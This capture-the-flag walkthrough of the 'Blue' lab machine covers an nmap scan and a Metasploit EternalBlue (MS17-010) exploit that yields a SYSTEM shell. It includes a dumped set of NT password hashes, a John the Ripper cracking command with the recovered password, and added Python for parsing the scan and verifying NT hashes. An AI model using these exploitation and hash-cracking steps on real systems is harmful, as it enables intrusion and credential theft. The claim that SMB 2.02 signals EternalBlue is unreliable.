Blue

Created by @darkstar7471

Tasks

  1. Recon

  2. Get Access

  3. Escalate

  4. Cracking

  5. Find Flags!

Recon

1) Scan the machine.

Created an alias for the target IP: alias blue.thm="10.10.84.x"

$ nmap -T4 -p- -A blue.thm
Nmap scan report for ip-10-10-84-143.eu-west-1.compute.internal (10.10.84.143)
Host is up (0.00050s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
| ssl-cert: Subject: commonName=Jon-PC
| Not valid before: 2020-10-10T12:59:17
|_Not valid after:  2021-04-11T12:59:17
|_ssl-date: 2020-10-11T13:29:35+00:00; 0s from scanner time.
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49158/tcp open  msrpc         Microsoft Windows RPC
49159/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 02:78:B8:DD:80:7F (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=10/11%OT=135%CT=1%CU=36872%PV=Y%DS=1%DC=D%G=Y%M=0278B8
OS:%TM=5F8308C4%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=108%TI=I%CI=I%TS
OS:=7)SEQ(SP=104%GCD=1%ISR=108%TI=I%CI=RD%II=I%SS=S%TS=7)SEQ(SP=104%GCD=1%I
OS:SR=108%TI=I%II=I%SS=S%TS=7)OPS(O1=M2301NW8ST11%O2=M2301NW8ST11%O3=M2301N
OS:W8NNT11%O4=M2301NW8ST11%O5=M2301NW8ST11%O6=M2301ST11)WIN(W1=2000%W2=2000
OS:%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M2301NW8NNS%
OS:CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%
OS:A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%
OS:DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%
OS:O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%
OS:RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 1 hop
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:78:b8:dd:80:7f (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-10-11T08:29:35-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-10-11 14:29:35
|_  start_date: 2020-10-11 13:59:15

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms ip-10-10-84-143.eu-west-1.compute.internal (10.10.84.143)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1701.57 seconds

2) How many ports are open with a port number under 1000?

3

3) What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

Considering that SMB 2.02 is in use, this machine is vulnerable to the EternalBlue exploit (MS17-010).
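As an added example (not part of the original writeup), here is a small Python parser over the scan output above. It answers the "open ports under 1000" question programmatically and pulls the SMB signing settings out of the host-script section, since "message signing enabled but not required" is the finding a defender would want to flag from this scan. NMAP_REPORT is a constructed excerpt of the report shown above; the function names are my own.

```python
import re

# Constructed excerpt of the nmap report above: the port table plus the SMB host-script lines
NMAP_REPORT = """\
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
| ssl-cert: Subject: commonName=Jon-PC
|_ssl-date: 2020-10-11T13:29:35+00:00; 0s from scanner time.
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49158/tcp open  msrpc         Microsoft Windows RPC
49159/tcp open  msrpc         Microsoft Windows RPC
Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
"""

# One row of nmap's normal-output port table: "445/tcp   open  microsoft-ds  <version text>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_ports(report: str) -> list:
    """Return one dict per port-table row; script output lines (starting with '|') are skipped."""
    ports = []
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": (m.group(5) or "").strip(),
            })
    return ports


def open_ports_below(ports: list, limit: int = 1000) -> list:
    """Sorted list of open port numbers strictly below `limit` (the room's question 2)."""
    return sorted(p["port"] for p in ports if p["state"] == "open" and p["port"] < limit)


def smb_signing(report: str) -> dict:
    """Extract the SMB1 and SMB2 signing lines from the smb-security-mode / smb2-security-mode scripts."""
    out = {}
    for raw in report.splitlines():
        text = raw.lstrip("|_ ").strip()      # drop nmap's script-output prefix characters
        if text.startswith("message_signing:"):
            out["smb1"] = text.split(":", 1)[1].strip()
        elif text.startswith("Message signing"):
            out["smb2"] = text
    return out


def signing_enforced(signing: dict) -> bool:
    """Signing only prevents tampering/relay when it is required, not merely enabled."""
    return any("required" in v and "not required" not in v for v in signing.values())


def audit(report: str) -> dict:
    """Summarise the scan the way a triage note would."""
    ports = parse_ports(report)
    low = open_ports_below(ports)
    signing = smb_signing(report)
    return {
        "open_ports": [p["port"] for p in ports],
        "open_below_1000": low,
        "count_below_1000": len(low),
        "smb_signing": signing,
        "signing_enforced": signing_enforced(signing),
    }


if __name__ == "__main__":
    for key, value in audit(NMAP_REPORT).items():
        print(f"{key}: {value}")
```

Running it against the excerpt reports 3 open ports below 1000 (135, 139, 445) and signing_enforced: False, which is the condition that makes the SMB service on 445 worth a closer look during triage.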

Gain Access

1) Start Metasploit

msfconsole

2) Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)

search eternalblue 
use exploit/windows/smb/ms17_010_eternalblue 

3) Show options and set the one required value. What is the name of this value? (All caps for submission)

show options
set RHOST blue.thm

4) Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

getuid
# NT AUTHORITY\SYSTEM

Escalate

Skipped 1-5 since we already have NT AUTHORITY\SYSTEM, although the post/multi/manage/shell_to_meterpreter module can be used here.

Skipping 6-8 since they ask to run commands to prove NT AUTHORITY privileges.

Cracking

Use hashdump in the Meterpreter shell to get the hashes (saved to a file named hashes):

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

1) Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Jon

2) Copy this password hash to a file and research how to crack it. What is the cracked password?

Use John the Ripper to crack the NT hashes with rockyou.txt:

sudo john --format=NT --rules -w=/usr/share/wordlists/rockyou.txt hashes

Jon's password is alqfna22
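As an added example (not part of the original writeup), the following Python reads the hashdump output above in pwdump format, explains what the two repeated hash values mean, and verifies the cracked password by recomputing the NT hash (MD4 over the UTF-16LE password). MD4 is implemented in pure Python because hashlib.new("md4") is unavailable on many OpenSSL 3 builds. HASHDUMP is copied from the dump above; the function names are my own.

```python
import struct

MASK = 0xFFFFFFFF
# LM hash of an empty string: LM storage is disabled or the password is longer than LM supports
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of an empty string: the account's stored password is blank
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Copied from the hashdump output above (user:rid:lm_hash:nt_hash:::)
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def _round(state, func, X, order, shifts, const):
    # One 16-step MD4 round; rotating the tuple reproduces the a, d, c, b step pattern of RFC 1320
    a, b, c, d = state
    for i, k in enumerate(order):
        a = _lrot((a + func(b, c, d) + X[k] + const) & MASK, shifts[i % 4])
        a, b, c, d = d, a, b, c
    return [a, b, c, d]


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)          # pad to 56 mod 64
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)  # little-endian bit length
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        s = _round(state, F, X, range(16), (3, 7, 11, 19), 0)
        s = _round(s, G, X, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999)
        s = _round(s, H, X, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1)
        state = [(v + w) & MASK for v, w in zip(state, s)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), as hex. No salt, so identical passwords hash identically."""
    return md4(password.encode("utf-16le")).hex()


def parse_pwdump(text: str) -> list:
    """Parse pwdump-style lines into dicts; hashes are normalised to lowercase hex."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        user, rid, lm, nt = line.split(":")[:4]
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return entries


def blank_password_accounts(entries: list) -> list:
    """Accounts whose NT hash is the empty-string hash, i.e. a blank stored password."""
    return [e["user"] for e in entries if e["nt"] == EMPTY_NT]


def users_matching(entries: list, candidate: str) -> list:
    """Users whose NT hash equals the hash of `candidate` (verifies a cracked password)."""
    h = nt_hash(candidate)
    return [e["user"] for e in entries if e["nt"] == h]


if __name__ == "__main__":
    entries = parse_pwdump(HASHDUMP)
    print("blank passwords:", blank_password_accounts(entries))
    print("accounts using 'alqfna22':", users_matching(entries, "alqfna22"))
```

On the dump above this reports Administrator and Guest as blank-password accounts (the built-in accounts are disabled on this box, which is why John only recovers one password) and confirms that the hash for Jon is the NT hash of alqfna22 without needing to rerun John.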

Find Flags!

1) Flag1?

2) Flag2?

3) Flag3?
